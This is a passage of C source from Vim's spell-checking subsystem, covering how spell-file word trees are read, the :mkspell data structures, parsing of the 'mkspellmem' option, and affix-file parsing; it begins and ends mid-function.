for (i = 0; to[i] != NUL; ++i)
lp->sl_sal_first[from[i]] = to[i];
lp->sl_sal.ga_len = 1; /* indicates we have soundfolding */
}
return 0;
}
/*
* Fill the first-index table for "lp".
*/
static void
set_sal_first(slang_T *lp)
{
salfirst_T *sfirst;
int i;
salitem_T *smp;
int c;
garray_T *gap = &lp->sl_sal;
sfirst = lp->sl_sal_first;
for (i = 0; i < 256; ++i)
sfirst[i] = -1;
smp = (salitem_T *)gap->ga_data;
for (i = 0; i < gap->ga_len; ++i)
{
#ifdef FEAT_MBYTE
if (has_mbyte)
/* Use the lowest byte of the first character. For latin1 it's
* the character, for other encodings it should differ for most
* characters. */
c = *smp[i].sm_lead_w & 0xff;
else
#endif
c = *smp[i].sm_lead;
if (sfirst[c] == -1)
{
sfirst[c] = i;
#ifdef FEAT_MBYTE
if (has_mbyte)
{
int n;
/* Make sure all entries with this byte are following each
* other. Move the ones that are in the wrong position. Do
* keep the same ordering! */
while (i + 1 < gap->ga_len
&& (*smp[i + 1].sm_lead_w & 0xff) == c)
/* Skip over entry with same index byte. */
++i;
for (n = 1; i + n < gap->ga_len; ++n)
if ((*smp[i + n].sm_lead_w & 0xff) == c)
{
salitem_T tsal;
/* Move entry with same index byte after the entries
* we already found. */
++i;
--n;
tsal = smp[i + n];
mch_memmove(smp + i + 1, smp + i,
sizeof(salitem_T) * n);
smp[i] = tsal;
}
}
#endif
}
}
}
#ifdef FEAT_MBYTE
/*
* Turn a multi-byte string into a wide character string.
* Return it in allocated memory (NULL for out-of-memory)
*/
static int *
mb_str2wide(char_u *s)
{
int *res;
char_u *p;
int i = 0;
res = (int *)alloc(sizeof(int) * (mb_charlen(s) + 1));
if (res != NULL)
{
for (p = s; *p != NUL; )
res[i++] = mb_ptr2char_adv(&p);
res[i] = NUL;
}
return res;
}
#endif
/*
* Read a tree from the .spl or .sug file.
* Allocates the memory and stores pointers in "bytsp" and "idxsp".
* This is skipped when the tree has zero length.
* Returns zero when OK, SP_ value for an error.
*/
static int
spell_read_tree(
FILE *fd,
char_u **bytsp,
idx_T **idxsp,
int prefixtree, /* TRUE for the prefix tree */
int prefixcnt) /* when "prefixtree" is TRUE: prefix count */
{
int len;
int idx;
char_u *bp;
idx_T *ip;
/* The tree size was computed when writing the file, so that we can
* allocate it as one long block. <nodecount> */
len = get4c(fd);
if (len < 0)
return SP_TRUNCERROR;
if (len >= 0x3ffffff)
/* Invalid length, multiply with sizeof(int) would overflow. */
return SP_FORMERROR;
if (len > 0)
{
/* Allocate the byte array. */
bp = lalloc((long_u)len, TRUE);
if (bp == NULL)
return SP_OTHERERROR;
*bytsp = bp;
/* Allocate the index array. */
ip = (idx_T *)lalloc_clear((long_u)(len * sizeof(int)), TRUE);
if (ip == NULL)
return SP_OTHERERROR;
*idxsp = ip;
/* Recursively read the tree and store it in the array. */
idx = read_tree_node(fd, bp, ip, len, 0, prefixtree, prefixcnt);
if (idx < 0)
return idx;
}
return 0;
}
/*
* Read one row of siblings from the spell file and store it in the byte array
* "byts" and index array "idxs". Recursively read the children.
*
* NOTE: The code here must match put_node()!
*
* Returns the index (>= 0) following the siblings.
* Returns SP_TRUNCERROR if the file is shorter than expected.
* Returns SP_FORMERROR if there is a format error.
*/
static idx_T
read_tree_node(
FILE *fd,
char_u *byts,
idx_T *idxs,
int maxidx, /* size of arrays */
idx_T startidx, /* current index in "byts" and "idxs" */
int prefixtree, /* TRUE for reading PREFIXTREE */
int maxprefcondnr) /* maximum for <prefcondnr> */
{
int len;
int i;
int n;
idx_T idx = startidx;
int c;
int c2;
#define SHARED_MASK 0x8000000
len = getc(fd); /* <siblingcount> */
if (len <= 0)
return SP_TRUNCERROR;
if (startidx + len >= maxidx)
return SP_FORMERROR;
byts[idx++] = len;
/* Read the byte values, flag/region bytes and shared indexes. */
for (i = 1; i <= len; ++i)
{
c = getc(fd); /* <byte> */
if (c < 0)
return SP_TRUNCERROR;
if (c <= BY_SPECIAL)
{
if (c == BY_NOFLAGS && !prefixtree)
{
/* No flags, all regions. */
idxs[idx] = 0;
c = 0;
}
else if (c != BY_INDEX)
{
if (prefixtree)
{
/* Read the optional pflags byte, the prefix ID and the
* condition nr. In idxs[] store the prefix ID in the low
* byte, the condition index shifted up 8 bits, the flags
* shifted up 24 bits. */
if (c == BY_FLAGS)
c = getc(fd) << 24; /* <pflags> */
else
c = 0;
c |= getc(fd); /* <affixID> */
n = get2c(fd); /* <prefcondnr> */
if (n >= maxprefcondnr)
return SP_FORMERROR;
c |= (n << 8);
}
else /* c must be BY_FLAGS or BY_FLAGS2 */
{
/* Read flags and optional region and prefix ID. In
* idxs[] the flags go in the low two bytes, region above
* that and prefix ID above the region. */
c2 = c;
c = getc(fd); /* <flags> */
if (c2 == BY_FLAGS2)
c = (getc(fd) << 8) + c; /* <flags2> */
if (c & WF_REGION)
c = (getc(fd) << 16) + c; /* <region> */
if (c & WF_AFX)
c = (getc(fd) << 24) + c; /* <affixID> */
}
idxs[idx] = c;
c = 0;
}
else /* c == BY_INDEX */
{
/* <nodeidx> */
n = get3c(fd);
if (n < 0 || n >= maxidx)
return SP_FORMERROR;
idxs[idx] = n + SHARED_MASK;
c = getc(fd); /* <xbyte> */
}
}
byts[idx++] = c;
}
/* Recursively read the children for non-shared siblings.
* Skip the end-of-word ones (zero byte value) and the shared ones (and
* remove SHARED_MASK) */
for (i = 1; i <= len; ++i)
if (byts[startidx + i] != 0)
{
if (idxs[startidx + i] & SHARED_MASK)
idxs[startidx + i] &= ~SHARED_MASK;
else
{
idxs[startidx + i] = idx;
idx = read_tree_node(fd, byts, idxs, maxidx, idx,
prefixtree, maxprefcondnr);
if (idx < 0)
break;
}
}
return idx;
}
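/*
 * For illustration, not a byte-exact dump: a tree holding just the words
 * "en" and "nl" has a root node with the two siblings 'e' and 'n'.  The
 * 'e' sibling points (through idxs[]) to a node whose only sibling is 'n',
 * the 'n' sibling to a node whose only sibling is 'l', and each of those
 * points in turn to a node containing a single NUL sibling (BY_NOFLAGS or
 * BY_FLAGS) that marks the end of the word; the flags/region/affix values
 * decoded above are stored in idxs[] at the index of that NUL sibling.
 */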
/*
* Reload the spell file "fname" if it's loaded.
*/
static void
spell_reload_one(
char_u *fname,
int added_word) /* invoked through "zg" */
{
slang_T *slang;
int didit = FALSE;
for (slang = first_lang; slang != NULL; slang = slang->sl_next)
{
if (fullpathcmp(fname, slang->sl_fname, FALSE) == FPC_SAME)
{
slang_clear(slang);
if (spell_load_file(fname, NULL, slang, FALSE) == NULL)
/* reloading failed, clear the language */
slang_clear(slang);
redraw_all_later(SOME_VALID);
didit = TRUE;
}
}
/* When "zg" was used and the file wasn't loaded yet, should redo
* 'spelllang' to load it now. */
if (added_word && !didit)
did_set_spelllang(curwin);
}
/*
* Functions for ":mkspell".
*/
#define MAXLINELEN 500 /* Maximum length in bytes of a line in a .aff
and .dic file. */
/*
* Main structure to store the contents of a ".aff" file.
*/
typedef struct afffile_S
{
char_u *af_enc; /* "SET", normalized, alloc'ed string or NULL */
int af_flagtype; /* AFT_CHAR, AFT_LONG, AFT_NUM or AFT_CAPLONG */
unsigned af_rare; /* RARE ID for rare word */
unsigned af_keepcase; /* KEEPCASE ID for keep-case word */
unsigned af_bad; /* BAD ID for banned word */
unsigned af_needaffix; /* NEEDAFFIX ID */
unsigned af_circumfix; /* CIRCUMFIX ID */
unsigned af_needcomp; /* NEEDCOMPOUND ID */
unsigned af_comproot; /* COMPOUNDROOT ID */
unsigned af_compforbid; /* COMPOUNDFORBIDFLAG ID */
unsigned af_comppermit; /* COMPOUNDPERMITFLAG ID */
unsigned af_nosuggest; /* NOSUGGEST ID */
int af_pfxpostpone; /* postpone prefixes without chop string and
without flags */
int af_ignoreextra; /* IGNOREEXTRA present */
hashtab_T af_pref; /* hashtable for prefixes, affheader_T */
hashtab_T af_suff; /* hashtable for suffixes, affheader_T */
hashtab_T af_comp; /* hashtable for compound flags, compitem_T */
} afffile_T;
#define AFT_CHAR 0 /* flags are one character */
#define AFT_LONG 1 /* flags are two characters */
#define AFT_CAPLONG 2 /* flags are one or two characters */
#define AFT_NUM 3 /* flags are numbers, comma separated */
typedef struct affentry_S affentry_T;
/* Affix entry from ".aff" file. Used for prefixes and suffixes. */
struct affentry_S
{
affentry_T *ae_next; /* next affix with same name/number */
char_u *ae_chop; /* text to chop off basic word (can be NULL) */
char_u *ae_add; /* text to add to basic word (can be NULL) */
char_u *ae_flags; /* flags on the affix (can be NULL) */
char_u *ae_cond; /* condition (NULL for ".") */
regprog_T *ae_prog; /* regexp program for ae_cond or NULL */
char ae_compforbid; /* COMPOUNDFORBIDFLAG found */
char ae_comppermit; /* COMPOUNDPERMITFLAG found */
};
#ifdef FEAT_MBYTE
# define AH_KEY_LEN 17 /* 2 x 8 bytes + NUL */
#else
# define AH_KEY_LEN 7 /* 6 digits + NUL */
#endif
/* Affix header from ".aff" file. Used for af_pref and af_suff. */
typedef struct affheader_S
{
char_u ah_key[AH_KEY_LEN]; /* key for hashtab == name of affix */
unsigned ah_flag; /* affix name as number, uses "af_flagtype" */
int ah_newID; /* prefix ID after renumbering; 0 if not used */
int ah_combine; /* suffix may combine with prefix */
int ah_follows; /* another affix block should be following */
affentry_T *ah_first; /* first affix entry */
} affheader_T;
#define HI2AH(hi) ((affheader_T *)(hi)->hi_key)
/* Flag used in compound items. */
typedef struct compitem_S
{
char_u ci_key[AH_KEY_LEN]; /* key for hashtab == name of compound */
unsigned ci_flag; /* affix name as number, uses "af_flagtype" */
int ci_newID; /* affix ID after renumbering. */
} compitem_T;
#define HI2CI(hi) ((compitem_T *)(hi)->hi_key)
/*
* Structure that is used to store the items in the word tree. This avoids
* the need to keep track of each allocated thing, everything is freed all at
* once after ":mkspell" is done.
* Note: "sb_next" must be just before "sb_data" to make sure the alignment of
* "sb_data" is correct for systems where pointers must be aligned on
* pointer-size boundaries and sizeof(pointer) > sizeof(int) (e.g., Sparc).
*/
#define SBLOCKSIZE 16000 /* size of sb_data */
typedef struct sblock_S sblock_T;
struct sblock_S
{
int sb_used; /* nr of bytes already in use */
sblock_T *sb_next; /* next block in list */
char_u sb_data[1]; /* data, actually longer */
};
/*
* A node in the tree.
*/
typedef struct wordnode_S wordnode_T;
struct wordnode_S
{
union /* shared to save space */
{
char_u hashkey[6]; /* the hash key, only used while compressing */
int index; /* index in written nodes (valid after first
round) */
} wn_u1;
union /* shared to save space */
{
wordnode_T *next; /* next node with same hash key */
wordnode_T *wnode; /* parent node that will write this node */
} wn_u2;
wordnode_T *wn_child; /* child (next byte in word) */
wordnode_T *wn_sibling; /* next sibling (alternate byte in word,
always sorted) */
int wn_refs; /* Nr. of references to this node. Only
relevant for first node in a list of
siblings, in following siblings it is
always one. */
char_u wn_byte; /* Byte for this node. NUL for word end */
/* Info for when "wn_byte" is NUL.
* In PREFIXTREE "wn_region" is used for the prefcondnr.
* In the soundfolded word tree "wn_flags" has the MSW of the wordnr and
* "wn_region" the LSW of the wordnr. */
char_u wn_affixID; /* supported/required prefix ID or 0 */
short_u wn_flags; /* WF_ flags */
short wn_region; /* region mask */
#ifdef SPELL_PRINTTREE
int wn_nr; /* sequence nr for printing */
#endif
};
#define WN_MASK 0xffff /* mask relevant bits of "wn_flags" */
#define HI2WN(hi) (wordnode_T *)((hi)->hi_key)
/*
* Info used while reading the spell files.
*/
typedef struct spellinfo_S
{
wordnode_T *si_foldroot; /* tree with case-folded words */
long si_foldwcount; /* nr of words in si_foldroot */
wordnode_T *si_keeproot; /* tree with keep-case words */
long si_keepwcount; /* nr of words in si_keeproot */
wordnode_T *si_prefroot; /* tree with postponed prefixes */
long si_sugtree; /* creating the soundfolding trie */
sblock_T *si_blocks; /* memory blocks used */
long si_blocks_cnt; /* memory blocks allocated */
int si_did_emsg; /* TRUE when we ran out of memory */
long si_compress_cnt; /* words to add before lowering
compression limit */
wordnode_T *si_first_free; /* List of nodes that have been freed during
compression, linked by "wn_child" field. */
long si_free_count; /* number of nodes in si_first_free */
#ifdef SPELL_PRINTTREE
int si_wordnode_nr; /* sequence nr for nodes */
#endif
buf_T *si_spellbuf; /* buffer used to store soundfold word table */
int si_ascii; /* handling only ASCII words */
int si_add; /* addition file */
int si_clear_chartab; /* when TRUE clear char tables */
int si_region; /* region mask */
vimconv_T si_conv; /* for conversion to 'encoding' */
int si_memtot; /* runtime memory used */
int si_verbose; /* verbose messages */
int si_msg_count; /* number of words added since last message */
char_u *si_info; /* info text chars or NULL */
int si_region_count; /* number of regions supported (1 when there
are no regions) */
char_u si_region_name[17]; /* region names; used only if
* si_region_count > 1 */
garray_T si_rep; /* list of fromto_T entries from REP lines */
garray_T si_repsal; /* list of fromto_T entries from REPSAL lines */
garray_T si_sal; /* list of fromto_T entries from SAL lines */
char_u *si_sofofr; /* SOFOFROM text */
char_u *si_sofoto; /* SOFOTO text */
int si_nosugfile; /* NOSUGFILE item found */
int si_nosplitsugs; /* NOSPLITSUGS item found */
int si_nocompoundsugs; /* NOCOMPOUNDSUGS item found */
int si_followup; /* soundsalike: "followup" value */
int si_collapse; /* soundsalike: "collapse_result" value */
hashtab_T si_commonwords; /* hashtable for common words */
time_t si_sugtime; /* timestamp for .sug file */
int si_rem_accents; /* soundsalike: remove accents */
garray_T si_map; /* MAP info concatenated */
char_u *si_midword; /* MIDWORD chars or NULL */
int si_compmax; /* max nr of words for compounding */
int si_compminlen; /* minimal length for compounding */
int si_compsylmax; /* max nr of syllables for compounding */
int si_compoptions; /* COMP_ flags */
garray_T si_comppat; /* CHECKCOMPOUNDPATTERN items, each stored as
a string */
char_u *si_compflags; /* flags used for compounding */
char_u si_nobreak; /* NOBREAK */
char_u *si_syllable; /* syllable string */
garray_T si_prefcond; /* table with conditions for postponed
* prefixes, each stored as a string */
int si_newprefID; /* current value for ah_newID */
int si_newcompID; /* current value for compound ID */
} spellinfo_T;
static afffile_T *spell_read_aff(spellinfo_T *spin, char_u *fname);
static int is_aff_rule(char_u **items, int itemcnt, char *rulename, int mincount);
static void aff_process_flags(afffile_T *affile, affentry_T *entry);
static int spell_info_item(char_u *s);
static unsigned affitem2flag(int flagtype, char_u *item, char_u *fname, int lnum);
static unsigned get_affitem(int flagtype, char_u **pp);
static void process_compflags(spellinfo_T *spin, afffile_T *aff, char_u *compflags);
static void check_renumber(spellinfo_T *spin);
static int flag_in_afflist(int flagtype, char_u *afflist, unsigned flag);
static void aff_check_number(int spinval, int affval, char *name);
static void aff_check_string(char_u *spinval, char_u *affval, char *name);
static int str_equal(char_u *s1, char_u *s2);
static void add_fromto(spellinfo_T *spin, garray_T *gap, char_u *from, char_u *to);
static int sal_to_bool(char_u *s);
static void spell_free_aff(afffile_T *aff);
static int spell_read_dic(spellinfo_T *spin, char_u *fname, afffile_T *affile);
static int get_affix_flags(afffile_T *affile, char_u *afflist);
static int get_pfxlist(afffile_T *affile, char_u *afflist, char_u *store_afflist);
static void get_compflags(afffile_T *affile, char_u *afflist, char_u *store_afflist);
static int store_aff_word(spellinfo_T *spin, char_u *word, char_u *afflist, afffile_T *affile, hashtab_T *ht, hashtab_T *xht, int condit, int flags, char_u *pfxlist, int pfxlen);
static int spell_read_wordfile(spellinfo_T *spin, char_u *fname);
static void *getroom(spellinfo_T *spin, size_t len, int align);
static char_u *getroom_save(spellinfo_T *spin, char_u *s);
static void free_blocks(sblock_T *bl);
static wordnode_T *wordtree_alloc(spellinfo_T *spin);
static int store_word(spellinfo_T *spin, char_u *word, int flags, int region, char_u *pfxlist, int need_affix);
static int tree_add_word(spellinfo_T *spin, char_u *word, wordnode_T *tree, int flags, int region, int affixID);
static wordnode_T *get_wordnode(spellinfo_T *spin);
static int deref_wordnode(spellinfo_T *spin, wordnode_T *node);
static void free_wordnode(spellinfo_T *spin, wordnode_T *n);
static void wordtree_compress(spellinfo_T *spin, wordnode_T *root);
static int node_compress(spellinfo_T *spin, wordnode_T *node, hashtab_T *ht, int *tot);
static int node_equal(wordnode_T *n1, wordnode_T *n2);
static int write_vim_spell(spellinfo_T *spin, char_u *fname);
static void clear_node(wordnode_T *node);
static int put_node(FILE *fd, wordnode_T *node, int idx, int regionmask, int prefixtree);
static void spell_make_sugfile(spellinfo_T *spin, char_u *wfname);
static int sug_filltree(spellinfo_T *spin, slang_T *slang);
static int sug_maketable(spellinfo_T *spin);
static int sug_filltable(spellinfo_T *spin, wordnode_T *node, int startwordnr, garray_T *gap);
static int offset2bytes(int nr, char_u *buf);
static void sug_write(spellinfo_T *spin, char_u *fname);
static void spell_message(spellinfo_T *spin, char_u *str);
static void init_spellfile(void);
/* In the postponed prefixes tree wn_flags is used to store the WFP_ flags,
* but it must be negative to indicate the prefix tree to tree_add_word().
* Use a negative number with the lower 8 bits zero. */
#define PFX_FLAGS -256
/* flags for "condit" argument of store_aff_word() */
#define CONDIT_COMB 1 /* affix must combine */
#define CONDIT_CFIX 2 /* affix must have CIRCUMFIX flag */
#define CONDIT_SUF 4 /* add a suffix for matching flags */
#define CONDIT_AFF 8 /* word already has an affix */
/*
* Tunable parameters for when the tree is compressed. See 'mkspellmem'.
*/
static long compress_start = 30000; /* memory / SBLOCKSIZE */
static long compress_inc = 100; /* memory / SBLOCKSIZE */
static long compress_added = 500000; /* word count */
/*
* Check the 'mkspellmem' option. Return FAIL if it's wrong.
* Sets "sps_flags".
*/
int
spell_check_msm(void)
{
char_u *p = p_msm;
long start = 0;
long incr = 0;
long added = 0;
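/* 'mkspellmem' has the form "{start},{inc},{added}". The first two values
* are amounts of memory in Kbyte, converted below to a number of SBLOCKSIZE
* blocks; the third value is a word count in units of 1024 words. */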
if (!VIM_ISDIGIT(*p))
return FAIL;
/* block count = (value * 1024) / SBLOCKSIZE (but avoid overflow) */
start = (getdigits(&p) * 10) / (SBLOCKSIZE / 102);
if (*p != ',')
return FAIL;
++p;
if (!VIM_ISDIGIT(*p))
return FAIL;
incr = (getdigits(&p) * 102) / (SBLOCKSIZE / 10);
if (*p != ',')
return FAIL;
++p;
if (!VIM_ISDIGIT(*p))
return FAIL;
added = getdigits(&p) * 1024;
if (*p != NUL)
return FAIL;
if (start == 0 || incr == 0 || added == 0 || incr > start)
return FAIL;
compress_start = start;
compress_inc = incr;
compress_added = added;
return OK;
}
#ifdef SPELL_PRINTTREE
/*
* For debugging the tree code: print the current tree in a (more or less)
* readable format, so that we can see what happens when adding a word and/or
* compressing the tree.
* Based on code from Olaf Seibert.
*/
#define PRINTLINESIZE 1000
#define PRINTWIDTH 6
#define PRINTSOME(l, depth, fmt, a1, a2) vim_snprintf(l + depth * PRINTWIDTH, \
PRINTLINESIZE - PRINTWIDTH * depth, fmt, a1, a2)
static char line1[PRINTLINESIZE];
static char line2[PRINTLINESIZE];
static char line3[PRINTLINESIZE];
static void
spell_clear_flags(wordnode_T *node)
{
wordnode_T *np;
for (np = node; np != NULL; np = np->wn_sibling)
{
np->wn_u1.index = FALSE;
spell_clear_flags(np->wn_child);
}
}
static void
spell_print_node(wordnode_T *node, int depth)
{
if (node->wn_u1.index)
{
/* Done this node before, print the reference. */
PRINTSOME(line1, depth, "(%d)", node->wn_nr, 0);
PRINTSOME(line2, depth, " ", 0, 0);
PRINTSOME(line3, depth, " ", 0, 0);
msg((char_u *)line1);
msg((char_u *)line2);
msg((char_u *)line3);
}
else
{
node->wn_u1.index = TRUE;
if (node->wn_byte != NUL)
{
if (node->wn_child != NULL)
PRINTSOME(line1, depth, " %c -> ", node->wn_byte, 0);
else
/* Cannot happen? */
PRINTSOME(line1, depth, " %c ???", node->wn_byte, 0);
}
else
PRINTSOME(line1, depth, " $ ", 0, 0);
PRINTSOME(line2, depth, "%d/%d ", node->wn_nr, node->wn_refs);
if (node->wn_sibling != NULL)
PRINTSOME(line3, depth, " | ", 0, 0);
else
PRINTSOME(line3, depth, " ", 0, 0);
if (node->wn_byte == NUL)
{
msg((char_u *)line1);
msg((char_u *)line2);
msg((char_u *)line3);
}
/* do the children */
if (node->wn_byte != NUL && node->wn_child != NULL)
spell_print_node(node->wn_child, depth + 1);
/* do the siblings */
if (node->wn_sibling != NULL)
{
/* get rid of all parent details except | */
STRCPY(line1, line3);
STRCPY(line2, line3);
spell_print_node(node->wn_sibling, depth);
}
}
}
static void
spell_print_tree(wordnode_T *root)
{
if (root != NULL)
{
/* Clear the "wn_u1.index" fields, used to remember what has been
* done. */
spell_clear_flags(root);
/* Recursively print the tree. */
spell_print_node(root, 0);
}
}
#endif /* SPELL_PRINTTREE */
/*
* Read the affix file "fname".
* Returns an afffile_T, NULL for complete failure.
*/
static afffile_T *
spell_read_aff(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
afffile_T *aff;
char_u rline[MAXLINELEN];
char_u *line;
char_u *pc = NULL;
#define MAXITEMCNT 30
char_u *(items[MAXITEMCNT]);
int itemcnt;
char_u *p;
int lnum = 0;
affheader_T *cur_aff = NULL;
int did_postpone_prefix = FALSE;
int aff_todo = 0;
hashtab_T *tp;
char_u *low = NULL;
char_u *fol = NULL;
char_u *upp = NULL;
int do_rep;
int do_repsal;
int do_sal;
int do_mapline;
int found_map = FALSE;
hashitem_T *hi;
int l;
int compminlen = 0; /* COMPOUNDMIN value */
int compsylmax = 0; /* COMPOUNDSYLMAX value */
int compoptions = 0; /* COMP_ flags */
int compmax = 0; /* COMPOUNDWORDMAX value */
char_u *compflags = NULL; /* COMPOUNDFLAG and COMPOUNDRULE
concatenated */
char_u *midword = NULL; /* MIDWORD value */
char_u *syllable = NULL; /* SYLLABLE value */
char_u *sofofrom = NULL; /* SOFOFROM value */
char_u *sofoto = NULL; /* SOFOTO value */
/*
* Open the file.
*/
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return NULL;
}
vim_snprintf((char *)IObuff, IOSIZE, _("Reading affix file %s ..."), fname);
spell_message(spin, IObuff);
/* Only do REP lines when not done in another .aff file already. */
do_rep = spin->si_rep.ga_len == 0;
/* Only do REPSAL lines when not done in another .aff file already. */
do_repsal = spin->si_repsal.ga_len == 0;
/* Only do SAL lines when not done in another .aff file already. */
do_sal = spin->si_sal.ga_len == 0;
/* Only do MAP lines when not done in another .aff file already. */
do_mapline = spin->si_map.ga_len == 0;
/*
* Allocate and init the afffile_T structure.
*/
aff = (afffile_T *)getroom(spin, sizeof(afffile_T), TRUE);
if (aff == NULL)
{
fclose(fd);
return NULL;
}
hash_init(&aff->af_pref);
hash_init(&aff->af_suff);
hash_init(&aff->af_comp);
/*
* Read all the lines in the file one by one.
*/
while (!vim_fgets(rline, MAXLINELEN, fd) && !got_int)
{
line_breakcheck();
++lnum;
/* Skip comment lines. */
if (*rline == '#')
continue;
/* Convert from "SET" to 'encoding' when needed. */
vim_free(pc);
#ifdef FEAT_MBYTE
if (spin->si_conv.vc_type != CONV_NONE)
{
pc = string_convert(&spin->si_conv, rline, NULL);
if (pc == NULL)
{
smsg((char_u *)_("Conversion failure for word in %s line %d: %s"),
fname, lnum, rline);
continue;
}
line = pc;
}
else
#endif
{
pc = NULL;
line = rline;
}
/* Split the line into white-space separated items. Put a NUL after each
* item. */
itemcnt = 0;
for (p = line; ; )
{
while (*p != NUL && *p <= ' ') /* skip white space and CR/NL */
++p;
if (*p == NUL)
break;
if (itemcnt == MAXITEMCNT) /* too many items */
break;
items[itemcnt++] = p;
/* A few items have arbitrary text argument, don't split them. */
if (itemcnt == 2 && spell_info_item(items[0]))
while (*p >= ' ' || *p == TAB) /* skip until CR/NL */
++p;
else
while (*p > ' ') /* skip until white space or CR/NL */
++p;
if (*p == NUL)
break;
*p++ = NUL;
}
/* Handle non-empty lines. */
if (itemcnt > 0)
{
if (is_aff_rule(items, itemcnt, "SET", 2) && aff->af_enc == NULL)
{
#ifdef FEAT_MBYTE
/* Setup for conversion from "ENC" to 'encoding'. */
aff->af_enc = enc_canonize(items[1]);
if (aff->af_enc != NULL && !spin->si_ascii
&& convert_setup(&spin->si_conv, aff->af_enc,
p_enc) == FAIL)
smsg((char_u *)_("Conversion in %s not supported: from %s to %s"),
fname, aff->af_enc, p_enc);
spin->si_conv.vc_fail = TRUE;
#else
smsg((char_u *)_("Conversion in %s not supported"), fname);
#endif
}
else if (is_aff_rule(items, itemcnt, "FLAG", 2)
&& aff->af_flagtype == AFT_CHAR)
{
if (STRCMP(items[1], "long") == 0)
aff->af_flagtype = AFT_LONG;
else if (STRCMP(items[1], "num") == 0)
aff->af_flagtype = AFT_NUM;
else if (STRCMP(items[1], "caplong") == 0)
aff->af_flagtype = AFT_CAPLONG;
else
smsg((char_u *)_("Invalid value for FLAG in %s line %d: %s"),
fname, lnum, items[1]);
if (aff->af_rare != 0
|| aff->af_keepcase != 0
|| aff->af_bad != 0
|| aff->af_needaffix != 0
|| aff->af_circumfix != 0
|| aff->af_needcomp != 0
|| aff->af_comproot != 0
|| aff->af_nosuggest != 0
|| compflags != NULL
|| aff->af_suff.ht_used > 0
|| aff->af_pref.ht_used > 0)
smsg((char_u *)_("FLAG after using flags in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (spell_info_item(items[0]))
{
p = (char_u *)getroom(spin,
(spin->si_info == NULL ? 0 : STRLEN(spin->si_info))
+ STRLEN(items[0])
+ STRLEN(items[1]) + 3, FALSE);
if (p != NULL)
{
if (spin->si_info != NULL)
{
STRCPY(p, spin->si_info);
STRCAT(p, "\n");
}
STRCAT(p, items[0]);
STRCAT(p, " ");
STRCAT(p, items[1]);
spin->si_info = p;
}
}
else if (is_aff_rule(items, itemcnt, "MIDWORD", 2)
&& midword == NULL)
{
midword = getroom_save(spin, items[1]);
}
else if (is_aff_rule(items, itemcnt, "TRY", 2))
{
/* ignored, we look in the tree for what chars may appear */
}
/* TODO: remove "RAR" later */
else if ((is_aff_rule(items, itemcnt, "RAR", 2)
|| is_aff_rule(items, itemcnt, "RARE", 2))
&& aff->af_rare == 0)
{
aff->af_rare = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
/* TODO: remove "KEP" later */
else if ((is_aff_rule(items, itemcnt, "KEP", 2)
|| is_aff_rule(items, itemcnt, "KEEPCASE", 2))
&& aff->af_keepcase == 0)
{
aff->af_keepcase = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if ((is_aff_rule(items, itemcnt, "BAD", 2)
|| is_aff_rule(items, itemcnt, "FORBIDDENWORD", 2))
&& aff->af_bad == 0)
{
aff->af_bad = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "NEEDAFFIX", 2)
&& aff->af_needaffix == 0)
{
aff->af_needaffix = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "CIRCUMFIX", 2)
&& aff->af_circumfix == 0)
{
aff->af_circumfix = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "NOSUGGEST", 2)
&& aff->af_nosuggest == 0)
{
aff->af_nosuggest = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if ((is_aff_rule(items, itemcnt, "NEEDCOMPOUND", 2)
|| is_aff_rule(items, itemcnt, "ONLYINCOMPOUND", 2))
&& aff->af_needcomp == 0)
{
aff->af_needcomp = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDROOT", 2)
&& aff->af_comproot == 0)
{
aff->af_comproot = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDFORBIDFLAG", 2)
&& aff->af_compforbid == 0)
{
aff->af_compforbid = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
if (aff->af_pref.ht_used > 0)
smsg((char_u *)_("Defining COMPOUNDFORBIDFLAG after PFX item may give wrong results in %s line %d"),
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDPERMITFLAG", 2)
&& aff->af_comppermit == 0)
{
aff->af_comppermit = affitem2flag(aff->af_flagtype, items[1],
fname, lnum);
if (aff->af_pref.ht_used > 0)
smsg((char_u *)_("Defining COMPOUNDPERMITFLAG after PFX item may give wrong results in %s line %d"),
fname, lnum);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDFLAG", 2)
&& compflags == NULL)
{
/* Turn flag "c" into COMPOUNDRULE compatible string "c+",
* "Na" into "Na+", "1234" into "1234+". */
p = getroom(spin, STRLEN(items[1]) + 2, FALSE);
if (p != NULL)
{
STRCPY(p, items[1]);
STRCAT(p, "+");
compflags = p;
}
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDRULES", 2))
{
/* We don't use the count, but do check that it's a number and
* not COMPOUNDRULE mistyped. */
if (atoi((char *)items[1]) == 0)
smsg((char_u *)_("Wrong COMPOUNDRULES value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDRULE", 2))
{
/* Don't use the first rule if it is a number. */
if (compflags != NULL || *skipdigits(items[1]) != NUL)
{
/* Concatenate this string to previously defined ones,
* using a slash to separate them. */
l = (int)STRLEN(items[1]) + 1;
if (compflags != NULL)
l += (int)STRLEN(compflags) + 1;
p = getroom(spin, l, FALSE);
if (p != NULL)
{
if (compflags != NULL)
{
STRCPY(p, compflags);
STRCAT(p, "/");
}
STRCAT(p, items[1]);
compflags = p;
}
}
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDWORDMAX", 2)
&& compmax == 0)
{
compmax = atoi((char *)items[1]);
if (compmax == 0)
smsg((char_u *)_("Wrong COMPOUNDWORDMAX value in %s line %d: %s"),
fname, lnum, items[1]);
}
else if (is_aff_rule(items, itemcnt, "COMPOUNDMIN", 2)
&& compminlen == 0)
{
compminlen = atoi((char *)items[1]);
if (compminlen == 0)
